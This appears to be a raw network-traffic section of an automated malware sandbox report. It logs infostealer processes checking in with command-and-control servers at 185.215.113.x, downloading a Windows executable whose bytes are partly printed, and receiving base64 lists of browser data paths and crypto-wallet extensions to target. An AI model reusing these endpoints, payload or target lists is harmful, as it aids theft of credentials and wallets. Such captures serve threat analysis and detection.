                                                                                                                                                                                                                                                Data Ascii: ~m!L.)q%tfht~PkstnQ^!(Da~nnE9bo&B6jeJ :\6IjD1].e}vX@5d]}-=?Fu](<</%V~pFsf:1


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                9192.168.2.449838185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:39.613930941 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014793001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:40.974961042 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                10192.168.2.449840185.215.113.16807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:41.444216967 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897053957 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:42 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 2817536
                                                                                                                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 12:24:52 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675c2794-2afe00"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 03 f4 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ ++`Ui` @ @.rsrc`2@.idata 8@qufopntd**:@phedmodh @+*@.taggant@`+"*@
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897083998 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897095919 CET448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897105932 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897116899 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897128105 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897140026 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897375107 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897386074 CET1236INData Raw: a3 8a 89 fc 63 98 39 1c e8 af 59 0d 80 a8 48 94 db a1 dd b4 fd e3 b0 20 a6 3e 04 04 23 c3 af 58 9b 32 f2 ad 08 17 2f c7 ab c7 e6 b7 53 cb c0 dc cd a0 fe 55 f5 19 27 2f dc 82 98 ed a8 64 2c f5 e5 15 63 62 52 21 fe fb 24 b1 25 66 b9 bf 93 b8 f6 73
                                                                                                                                                                                                                                                Data Ascii: c9YH >#X2/SU'/d,cbR!$%fse#C(>sH$Frfpxn%k*&[<d:-%2?>+x-s(Y8%Q%aE[12}^X\C:aOh,O>-G/,DC\&
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.897398949 CET1236INData Raw: 22 7e 4f c0 2d 72 93 46 5b ae dd 6d 21 d1 84 ef b4 85 5b ce 61 73 08 2e 12 20 37 83 c4 72 7a b6 5b aa 37 f8 75 70 d9 b8 13 77 ac f7 1c 5e 5e f3 a1 c7 ea e1 9f 11 45 40 21 41 2d 64 2a 4e bb f9 23 3c 2b 13 6d c9 57 f7 af b5 e1 15 46 51 c0 13 e4 44
                                                                                                                                                                                                                                                Data Ascii: "~O-rF[m![as. 7rz[7upw^^E@!A-d*N#<+mWFQDQ+pIX/.OrPC" JDZ/P'>BZy=A-<"Q*5Es:`#n[l'iO[1j%z _;![caw\0~X[PrV
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.023370981 CET1236INData Raw: 19 c6 f2 33 f8 70 ff b9 26 44 72 f8 f0 6f 62 e0 43 b0 af 09 45 9a 80 97 f9 4a a5 aa 2f 92 fe 5c 59 83 c3 8c e7 18 bd ef e2 97 b0 e0 d9 68 e3 c0 49 86 a7 ed 17 5e c3 dc 64 f6 39 17 61 67 ac 7d 06 bd 26 c8 44 9b b4 d1 76 81 23 cd 15 07 30 c0 4b 7a
                                                                                                                                                                                                                                                Data Ascii: 3p&DrobCEJ/\YhI^d9ag}&Dv#0KzP41p:p5trBR$~g!.Yx<rZKcpkU,4TA`.wb+7H'xj,4p2ZBKXt!UG'2Y02+j6z;K


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                11192.168.2.449848185.215.113.206807356C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:42.448187113 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:43.800183058 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:43 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.080368996 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FCAECAKKFBGCBGDGIEHC
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 211
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 37 38 34 45 46 46 34 43 41 34 32 39 33 36 30 35 30 34 37 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 43 41 4b 4b 46 42 47 43 42 47 44 47 49 45 48 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: ------FCAECAKKFBGCBGDGIEHCContent-Disposition: form-data; name="hwid"DB784EFF4CA42936050476------FCAECAKKFBGCBGDGIEHCContent-Disposition: form-data; name="build"stok------FCAECAKKFBGCBGDGIEHC--
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.539745092 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:44 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Content-Length: 180
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 4e 6a 52 68 4d 47 4a 6a 5a 6a 6b 30 59 32 55 79 4d 44 52 69 4e 6a 63 33 4d 44 67 78 4d 7a 49 32 4d 32 46 6a 4e 6a 52 6d 4d 44 45 34 4d 44 41 34 4f 47 45 78 5a 6a 4a 6d 4d 54 51 7a 4d 6d 59 78 4e 44 63 33 4f 47 5a 69 4d 54 4d 31 4d 6a 64 69 4e 54 59 7a 59 6a 68 6b 5a 44 63 77 4f 57 55 77 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                Data Ascii: NjRhMGJjZjk0Y2UyMDRiNjc3MDgxMzI2M2FjNjRmMDE4MDA4OGExZjJmMTQzMmYxNDc3OGZiMTM1MjdiNTYzYjhkZDcwOWUwfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:44.547063112 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AFHJJEHIEBKKFIDHDGHJ
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 268
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 4a 4a 45 48 49 45 42 4b 4b 46 49 44 48 44 47 48 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: ------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------AFHJJEHIEBKKFIDHDGHJContent-Disposition: form-data; name="message"browsers------AFHJJEHIEBKKFIDHDGHJ--
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.234523058 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:44 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Content-Length: 2028
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.234533072 CET124INData Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45
                                                                                                                                                                                                                                                Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdT
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.249372005 CET896INData Raw: 64 47 46 79 66 46 77 33 55 33 52 68 63 6c 77 33 55 33 52 68 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 78 44 61 47 56 6b 62 33 51 67 51 6e 4a 76 64 33 4e 6c 63 6e 78 63 51 32 68 6c 5a 47 39 30 58 46
                                                                                                                                                                                                                                                Data Ascii: dGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNaWNyb3NvZnRcRWRnZVxBcHB
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.272130966 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJK
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 267
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="message"plugins------KEGIDHJKKJDGCBGCGIJK--
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.765995979 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:45 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Content-Length: 7116
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.766046047 CET124INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                                Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:45.766385078 CET1236INData Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32
